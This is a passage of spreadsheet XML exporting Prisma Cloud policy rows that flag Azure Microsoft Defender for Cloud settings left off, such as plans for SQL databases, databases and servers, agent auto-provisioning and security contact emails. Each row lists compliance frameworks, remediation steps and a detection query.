      <c r="AF2401" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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01" t="inlineStr">
        <is>
          <t>bcbef6e6-ee17-414c-af80-b05f2f470f66</t>
        </is>
      </c>
      <c r="AI2401" t="inlineStr">
        <is>
          <t>bf60b138-29ae-4fb9-b21f-c9deda3f9552</t>
        </is>
      </c>
      <c r="AJ2401" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2401" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2402">
      <c r="A2402" t="inlineStr">
        <is>
          <t>ISO/IEC 27017:2015, kfirdaus AWS Account-CS, CIS v1.5.0 (Azure) - Level 2, NIST SP 800-172, CIS v1.3.0 (Azure), ISO/IEC 27017:2015, CSA CCM v.4.0.1, CIS v1.4.0 (Azure), CIS v2.1.0 (Azure) Level 2, CIS v2.0.0 (Azure) Level 2, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, Copy of CIS Controls v8, Azure Security Benchmark (v3), MLPS 2.0 (Level 2), Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, NIST CSF, Copy of Azure Security Benchmark (v3), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, Insurance Regulatory And Development Authority Of India, ISO/IEC 27002:2013, PCI DSS v3.2.1, ISO/IEC 27002:2013, MTSBv2_Azure, ISO/IEC 27017:2015, Copy of Azure Security Benchmark (v3), CSA CCM v.4.0.1, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, Azure Security Benchmark (v3), CSA CCM v.4.0.1, ISO/IEC 27002:2013, Copy of CIS v1.2.0 (Azure), ACSC Information Security Manual (ISM), CIS v1.2.0 (Azure), HITRUST v.9.4.2 [Deprecated], Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v8.1, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, Azure Security Benchmark (v2), Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, CIS Controls v7.1, CIS v1.3.1 (Azure), NIST SP 800-172, CSA CCM v.4.0.1, MLPS 2.0 (Level 2), CSA CCM v.4.0.1, ISO/IEC 27018:2019, Secure Controls Framework (SCF) - 2024.2</t>
        </is>
      </c>
      <c r="B2402" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2402" s="2" t="inlineStr"/>
      <c r="D2402" t="inlineStr"/>
      <c r="E2402" t="inlineStr"/>
      <c r="F2402" t="inlineStr"/>
      <c r="G2402" t="b">
        <v>1</v>
      </c>
      <c r="H24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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2402" t="inlineStr">
        <is>
          <t>azure-security-center</t>
        </is>
      </c>
      <c r="K2402" t="inlineStr">
        <is>
          <t>Azure Microsoft Defender for Cloud is set to Off for Azure SQL Databases</t>
        </is>
      </c>
      <c r="L2402" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2402" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2402" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2402" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2402" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2402" t="inlineStr">
        <is>
          <t>Guidelines for Outsourcing</t>
        </is>
      </c>
      <c r="R2402" t="inlineStr">
        <is>
          <t>ISM-1570</t>
        </is>
      </c>
      <c r="S2402" t="inlineStr"/>
      <c r="T2402" t="b">
        <v>0</v>
      </c>
      <c r="U2402" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2402" t="inlineStr">
        <is>
          <t>azure-security-center-settings</t>
        </is>
      </c>
      <c r="W2402" t="inlineStr">
        <is>
          <t>This policy identifies Azure Microsoft Defender for Cloud (previously known as Azure Security Center and Azure Defender) which has defender setting for Azure SQL Databases is set to Off. Enabling Microsoft Defender for Cloud provides the tools needed to harden your resources, track your security posture, protect against cyberattacks, and streamline security management. It is highly recommended to enable Microsoft Defender for Azure SQL Databases.</t>
        </is>
      </c>
      <c r="X2402"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'Azure SQL Databases' Select 'On' under Plan.
8. Select 'Save' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-azure-sql-database-servers
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-azure-sql-database-servers</t>
        </is>
      </c>
      <c r="Y2402" t="inlineStr"/>
      <c r="Z2402" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-security-center-settings' AND json.rule = pricings[?any( name equals SqlServers and properties.pricingTier does not equal Standard)] exists
{"category":"General","resourceTypes":["azurerm_security_center_subscription_pricing"]}</t>
        </is>
      </c>
      <c r="AA2402" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2402" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2402" t="inlineStr">
        <is>
          <t>PC-AZR-SC-641-CKV_AZURE_69</t>
        </is>
      </c>
      <c r="AD2402" t="b">
        <v>1</v>
      </c>
      <c r="AE2402" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2402" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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2" t="inlineStr">
        <is>
          <t>c3f78c20-8967-47a0-a02b-1efc3810c666</t>
        </is>
      </c>
      <c r="AI2402" t="inlineStr">
        <is>
          <t>49145cce-b067-4fd5-bf7c-cce4035439d0</t>
        </is>
      </c>
      <c r="AJ2402" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2402" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2403">
      <c r="A2403" t="inlineStr">
        <is>
          <t>ISO 27001:2013, Brazilian Data Protection Law (LGPD), ISO/IEC 27017:2015, APRA (CPS 234) Information Security, NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, New Zealand Information Security Manual (NZISM v3.4), Azure Security Benchmark (v2), Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, Azure Security Benchmark (v3), ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO 27001:2013, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), CIS v1.5.0 (Azure) - Level 1, Fedramp (Moderate), Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, NIST CSF, ISO 27001:2013, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), CIS v2.0.0 (Azure) Level 1, CyberSecurity Law of the People's Republic of China, CSA CCM v.4.0.1, CIS v1.2.0 (Azure), NIST SP 800-171 Revision 3, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, CyberSecurity Law of the People's Republic of China, ISO/IEC 27002:2013, ISO/IEC 27017:2015, ISO 27001:2013, CIS v1.4.0 (Azure), Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, CIS v1.3.1 (Azure), ISO/IEC 27002:2013, CIS v2.1.0 (Azure) Level 1, APRA (CPS 234) Information Security, ACSC Information Security Manual (ISM), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), APRA (CPS 234) Information Security, HITRUST v.9.4.2 [Deprecated], Secure Controls Framework (SCF) - 2024.2, NIST 800-53 Rev4, ISO 27001:2013, Azure Security Benchmark (v3), CIS Controls v8.1, ISO/IEC 27002:2013, CCPA 2018, PIPEDA, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2022.2.1, CyberSecurity Law of the People's Republic of China, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, CSA CCM v.4.0.1, MLPS 2.0 (Level 2), CSA CCM v.4.0.1, ISO/IEC 27018:2019, CIS v1.1 (Azure), CIS v1.3.0 (Azure)</t>
        </is>
      </c>
      <c r="B2403" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2403" s="2" t="inlineStr"/>
      <c r="D2403" t="inlineStr"/>
      <c r="E2403" t="inlineStr"/>
      <c r="F2403" t="inlineStr"/>
      <c r="G2403" t="b">
        <v>0</v>
      </c>
      <c r="H24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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2403" t="inlineStr">
        <is>
          <t>azure-security-center</t>
        </is>
      </c>
      <c r="K2403" t="inlineStr">
        <is>
          <t>Azure Microsoft Defender for Cloud automatic provisioning of log Analytics agent for Azure VMs is set to Off</t>
        </is>
      </c>
      <c r="L2403" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2403" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2403" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2403" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2403" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2403" t="inlineStr">
        <is>
          <t>Security Center</t>
        </is>
      </c>
      <c r="R2403" t="inlineStr">
        <is>
          <t>2.11</t>
        </is>
      </c>
      <c r="S2403" t="inlineStr">
        <is>
          <t>Security_Center</t>
        </is>
      </c>
      <c r="T2403" t="b">
        <v>1</v>
      </c>
      <c r="U2403" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2403" t="inlineStr">
        <is>
          <t>azure-security-center-settings</t>
        </is>
      </c>
      <c r="W2403" t="inlineStr">
        <is>
          <t>This policy identifies the Azure Microsoft Defender for Cloud (previously known as Azure Security Center and Azure Defender) which has automatic provisioning of log Analytics agent for Azure VMs is set to Off. Microsoft Defender for Cloud provisions the Microsoft Monitoring Agent on all existing supported Azure virtual machines and any new ones that are created. The Microsoft Monitoring Agent scans for various security-related configurations and events such as system updates, OS vulnerabilities, endpoint protection, and provides alerts.</t>
        </is>
      </c>
      <c r="X2403" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Go to 'Microsoft Defender for Cloud' dashboard
3. Select 'Environment Settings'
4. Click on the reported subscription name
5. Select the 'Settings &amp; monitoring'
6. Set Status 'On' for 'Log Analytics agent/Azure Monitor agent' component
7. Click on 'Continue'
8. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2403" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.Security/autoProvisioningSettings/*' permission. Successful execution will enable automatic provisioning of monitoring agent.",
'impact': 'enable automatic provisioning of monitoring agent',
'cliScriptTemplate': 'az security auto-provisioning-setting update --name "$resourceName" --auto-provision "on"'</t>
        </is>
      </c>
      <c r="Z2403" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-security-center-settings' AND json.rule = 'autoProvisioningSettings[*].name equals default and (autoProvisioningSettings[*].properties.autoProvision equals Off or autoProvisioningSettings[*] does not exist)'</t>
        </is>
      </c>
      <c r="AA2403" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2403" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2403" t="inlineStr">
        <is>
          <t>PC-AZR-SC-110</t>
        </is>
      </c>
      <c r="AD2403" t="b">
        <v>1</v>
      </c>
      <c r="AE2403" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2403" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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3" t="inlineStr">
        <is>
          <t>6c5091cc-2da3-42b3-877e-42fd7d9e85d6</t>
        </is>
      </c>
      <c r="AI2403" t="inlineStr">
        <is>
          <t>a885d51a-0b78-4a2f-88ed-3f4bf58616ab</t>
        </is>
      </c>
      <c r="AJ2403" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2403" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2404">
      <c r="A2404" t="inlineStr">
        <is>
          <t>CIS v2.0.0 (Azure) Level 2, CIS v1.5.0 (Azure) - Level 2, Insurance Regulatory And Development Authority Of India</t>
        </is>
      </c>
      <c r="B2404" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2404" s="2" t="inlineStr"/>
      <c r="D2404" t="inlineStr"/>
      <c r="E2404" t="inlineStr"/>
      <c r="F2404" t="inlineStr"/>
      <c r="G2404" t="b">
        <v>1</v>
      </c>
      <c r="H24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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2404" t="inlineStr">
        <is>
          <t>azure-security-center</t>
        </is>
      </c>
      <c r="K2404" t="inlineStr">
        <is>
          <t>Azure Microsoft Defender for Cloud set to Off for Databases</t>
        </is>
      </c>
      <c r="L2404" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2404" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2404" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2404" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2404" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2404" t="inlineStr">
        <is>
          <t>Security Domain Policies</t>
        </is>
      </c>
      <c r="R2404" t="inlineStr">
        <is>
          <t>Cloud Security Policy</t>
        </is>
      </c>
      <c r="S2404" t="inlineStr"/>
      <c r="T2404" t="b">
        <v>0</v>
      </c>
      <c r="U2404" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2404" t="inlineStr">
        <is>
          <t>azure-security-center-settings</t>
        </is>
      </c>
      <c r="W2404" t="inlineStr">
        <is>
          <t>This policy identifies Azure Microsoft Defender for Cloud which has defender setting for Databases set to Off. Enabling Azure Defender for Cloud provides advanced security capabilities like threat intelligence, anomaly detection, and behaviour analytics. Defender for Databases in Microsoft Defender for Cloud allows you to protect your entire database estate with attack detection and threat response for the most popular database types in Azure. It is highly recommended to enable Azure Defender for Databases.</t>
        </is>
      </c>
      <c r="X2404" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Go to 'Microsoft Defender for Cloud'
3. Select 'Environment Settings'
4. Click on the subscription name
5. Select the 'Defender plans'
6. Set 'Databases' Status to 'On'
7. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2404" t="inlineStr"/>
      <c r="Z2404" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-security-center-settings' AND json.rule = pricings[?any((name equals SqlServers and properties.pricingTier does not equal Standard) or (name equals CosmosDbs and properties.pricingTier does not equal Standard) or (name equals OpenSourceRelationalDatabases and properties.pricingTier does not equal Standard) or (name equals SqlServerVirtualMachines and properties.pricingTier does not equal Standard))] exists</t>
        </is>
      </c>
      <c r="AA2404" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2404" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2404" t="inlineStr">
        <is>
          <t>PC-AZR-SC-1105</t>
        </is>
      </c>
      <c r="AD2404" t="b">
        <v>1</v>
      </c>
      <c r="AE2404" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2404" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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4" t="inlineStr">
        <is>
          <t>0293090c-c413-4859-b4da-f31aa1ded837</t>
        </is>
      </c>
      <c r="AI2404" t="inlineStr">
        <is>
          <t>a7dad1ea-5755-43af-afa1-f2d61aa710a4</t>
        </is>
      </c>
      <c r="AJ2404" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2404" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2405">
      <c r="A2405" t="inlineStr">
        <is>
          <t>ISO 27001:2013, Brazilian Data Protection Law (LGPD), NIST SP 800-171 Revision 2, APRA (CPS 234) Information Security, NIST CSF v2.0, NIST CSF, NIST 800-53 Rev4, NIST 800-53 Rev 5, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), GDPR, HITRUST CSF v9.3 [Deprecated], TX-RAMP Level 2, NIST CSF, CSA CCM v3.0.1, APRA (CPS 234) Information Security, SOC 2, GDPR, Azure Security Benchmark (v2), NIST CSF, CIS v2.1.0 (Azure) Level 1, PCI DSS v3.2.1, CyberSecurity Law of the People's Republic of China, HITRUST CSF v9.3 [Deprecated], CIS v1.3.1 (Azure), NIST 800-53 Rev4, NIST CSF, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, RBI Baseline Cyber Security and Resilience Requirements, ISO 27001:2013, SOC 2, CIS v1.1 (Azure), CSA CCM v3.0.1, SOC 2, NIST CSF, MLPS 2.0 (Level 2), NIST CSF, HITRUST CSF v9.3 [Deprecated], NIST CSF, Secure Controls Framework (SCF) - 2024.2, NIST 800-53 Rev 5, CIS Controls v8, HITRUST CSF v9.3 [Deprecated], NIST 800-53 Rev4, NIST CSF v2.0, CIS v1.3.0 (Azure), SOC 2, CSA CCM v3.0.1, ISO 27001:2013, Secure Controls Framework (SCF) - 2024.2, MLPS 2.0 (Level 2), CSA CCM v3.0.1, ISO 27001:2013, Secure Controls Framework (SCF) - 2024.2, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, HITRUST CSF v9.3 [Deprecated], NYDFS 23 CRR-NY 500.0, NIST CSF, CIS v1.2.0 (Azure), Insurance Regulatory And Development Authority Of India, NIST CSF, NIST SP 800-171 Revision 3, CIS v2.0.0 (Azure) Level 1, NIST 800-53 Rev 5, CRI Profile v2.0, NIST CSF, CyberSecurity Law of the People's Republic of China, CSA CCM v3.0.1, NIST 800-53 Rev4, CIS v1.5.0 (Azure) - Level 1, NIST CSF, CIS v1.4.0 (Azure), HIPAA, NIST 800-53 Rev4, NIST 800-53 Rev4, TX-RAMP Level 1, SOC 2, NIST CSF, APRA (CPS 234) Information Security, Azure Security Benchmark (v3), CSA CCM v3.0.1, SOC 2, ACSC Information Security Manual (ISM), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST CSF v2.0, APRA (CPS 234) Information Security, NIST SP 800-171 Revision 2, CSA CCM v3.0.1, GDPR, NIST CSF, NIST CSF, SOC 2, NIST CSF, HITRUST CSF v9.3 [Deprecated], NIST SP 800-171 Revision 3, New Zealand Information Security Manual (NZISM v3.4), NIST CSF, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27001:2022, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CIS Controls v8.1, TX-RAMP Level 2, CSA CCM v3.0.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CSA CCM v3.0.1, Secure Controls Framework (SCF) - 2022.2.1, NIST 800-53 Rev 5, Sarbanes Oxley Act (SOX), NIST CSF, CIS Controls v7.1, CIS Controls v8.1, NIST CSF, NIST 800-53 Rev 5, Fedramp (Moderate), NIST SP 800-172, SOC 2, CSA CCM v3.0.1, MLPS 2.0 (Level 2), NIST CSF v2.0, HITRUST CSF v9.3 [Deprecated], HITRUST CSF v9.3 [Deprecated], ITSG-33, NIST 800-53 Rev 5, NIST 800-53 Rev4, Fedramp (Moderate), TX-RAMP Level 1</t>
        </is>
      </c>
      <c r="B2405" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2405" s="2" t="inlineStr"/>
      <c r="D2405" t="inlineStr"/>
      <c r="E2405" t="inlineStr"/>
      <c r="F2405" t="inlineStr"/>
      <c r="G2405" t="b">
        <v>1</v>
      </c>
      <c r="H24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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2405" t="inlineStr">
        <is>
          <t>azure-security-center</t>
        </is>
      </c>
      <c r="K2405" t="inlineStr">
        <is>
          <t>Azure Microsoft Defender for Cloud security contact additional email is not set</t>
        </is>
      </c>
      <c r="L2405" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2405" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2405" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2405" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2405" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2405" t="inlineStr">
        <is>
          <t>AU</t>
        </is>
      </c>
      <c r="R2405" t="inlineStr">
        <is>
          <t>AU-06-00 : Audit Record Review, Analysis, and Reporting</t>
        </is>
      </c>
      <c r="S2405" t="inlineStr">
        <is>
          <t>Security_Center</t>
        </is>
      </c>
      <c r="T2405" t="b">
        <v>0</v>
      </c>
      <c r="U2405" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2405" t="inlineStr">
        <is>
          <t>azure-security-center-settings</t>
        </is>
      </c>
      <c r="W2405" t="inlineStr">
        <is>
          <t>This policy identifies the Azure Microsoft Defender for Cloud (previously known as Azure Security Center and Azure Defender) which has not set security contact additional email addresses. Microsoft Defender for Cloud emails the subscription owners whenever a high-severity alert is triggered for their subscription. Providing a security contact email address as an additional email address ensures that the proper people are aware of any potential compromise in order to mitigate the risk in a timely fashion.</t>
        </is>
      </c>
      <c r="X2405" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Go to 'Microsoft Defender for Cloud'
3. Select 'Environment Settings'
4. Click on the subscription name
5. Click on 'Email notifications'
6. Enter a valid security contact email address (or multiple addresses separated by commas) in the 'Additional email addresses' field
7. Select 'Save'</t>
        </is>
      </c>
      <c r="Y2405" t="inlineStr"/>
      <c r="Z2405" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-security-center-settings' AND json.rule = (securityContacts is empty or securityContacts[?any(properties.email is empty)] exists) and pricings[?any(properties.pricingTier equal ignore case Standard)] exists</t>
        </is>
      </c>
      <c r="AA2405" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2405" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2405" t="inlineStr">
        <is>
          <t>PC-AZR-SC-123</t>
        </is>
      </c>
      <c r="AD2405" t="b">
        <v>1</v>
      </c>
      <c r="AE2405" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2405" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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5" t="inlineStr">
        <is>
          <t>46e24e8c-945c-4048-91f2-800cccf54613</t>
        </is>
      </c>
      <c r="AI2405" t="inlineStr">
        <is>
          <t>1de985c8-bacb-4780-9296-d0d7e3b596f6</t>
        </is>
      </c>
      <c r="AJ2405" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2405" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2406">
      <c r="A2406" t="inlineStr">
        <is>
          <t>ISO/IEC 27017:2015, kfirdaus AWS Account-CS, CIS v1.3.0 (Azure), NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.1, CIS v1.5.0 (Azure) - Level 2, CIS v1.2.0 (Azure), ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, Copy of CIS Controls v8, Azure Security Benchmark (v3), MLPS 2.0 (Level 2), CIS v1.4.0 (Azure), Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, NIST CSF, Azure Security Benchmark (v2), Copy of Azure Security Benchmark (v3), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, Insurance Regulatory And Development Authority Of India, ISO/IEC 27002:2013, PCI DSS v3.2.1, ISO/IEC 27002:2013, ISO/IEC 27017:2015, Copy of Azure Security Benchmark (v3), CSA CCM v.4.0.1, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, Azure Security Benchmark (v3), CSA CCM v.4.0.1, ISO/IEC 27002:2013, CIS v1.3.1 (Azure), ACSC Information Security Manual (ISM), HITRUST v.9.4.2 [Deprecated], Copy of CIS v1.2.0 (Azure), Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v8.1, MTSBv2_Azure, ISO/IEC 27002:2013, CIS v2.0.0 (Azure) Level 2, Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, CIS Controls v7.1, CIS v2.1.0 (Azure) Level 2, NIST SP 800-172, CSA CCM v.4.0.1, MLPS 2.0 (Level 2), CSA CCM v.4.0.1, ISO/IEC 27018:2019, Secure Controls Framework (SCF) - 2024.2</t>
        </is>
      </c>
      <c r="B2406" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2406" s="2" t="inlineStr"/>
      <c r="D2406" t="inlineStr"/>
      <c r="E2406" t="inlineStr"/>
      <c r="F2406" t="inlineStr"/>
      <c r="G2406" t="b">
        <v>1</v>
      </c>
      <c r="H24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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2406" t="inlineStr">
        <is>
          <t>azure-security-center</t>
        </is>
      </c>
      <c r="K2406" t="inlineStr">
        <is>
          <t>Azure Microsoft Defender for Cloud is set to Off for Servers</t>
        </is>
      </c>
      <c r="L2406" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2406" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2406" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2406" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2406" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2406" t="inlineStr">
        <is>
          <t>Security Center</t>
        </is>
      </c>
      <c r="R2406" t="inlineStr">
        <is>
          <t>2.1</t>
        </is>
      </c>
      <c r="S2406" t="inlineStr"/>
      <c r="T2406" t="b">
        <v>0</v>
      </c>
      <c r="U2406" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2406" t="inlineStr">
        <is>
          <t>azure-security-center-settings</t>
        </is>
      </c>
      <c r="W2406" t="inlineStr">
        <is>
          <t>This policy identifies Azure Microsoft Defender for Cloud (previously known as Azure Security Center and Azure Defender) which has defender setting for Servers is set to Off. Enabling Microsoft Defender for Cloud provides the tools needed to harden your resources, track your security posture, protect against cyberattacks, and streamline security management. It is highly recommended to enable Microsoft Defender for Servers.</t>
        </is>
      </c>
      <c r="X2406"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'Servers' Select 'On' under Plan.
8. Select 'Save' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-servers
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-servers</t>
        </is>
      </c>
      <c r="Y2406" t="inlineStr"/>
      <c r="Z2406" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-security-center-settings' AND json.rule = pricings[?any( name equals VirtualMachines and properties.pricingTier does not equal Standard)] exists
{"category":"General","resourceTypes":["azurerm_security_center_subscription_pricing"]}</t>
        </is>
      </c>
      <c r="AA2406" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2406" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2406" t="inlineStr">
        <is>
          <t>PC-AZR-SC-640-CKV_AZURE_55</t>
        </is>
      </c>
      <c r="AD2406" t="b">
        <v>1</v>
      </c>
      <c r="AE2406" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2406" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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6" t="inlineStr">
        <is>
          <t>eb5f5af1-754d-4f6b-9c08-610a6974db16</t>
        </is>
      </c>
      <c r="AI2406" t="inlineStr">
        <is>
          <t>3b5a4a78-f4d4-442d-b688-0c299a6305b1</t>
        </is>
      </c>
      <c r="AJ2406" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2406" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
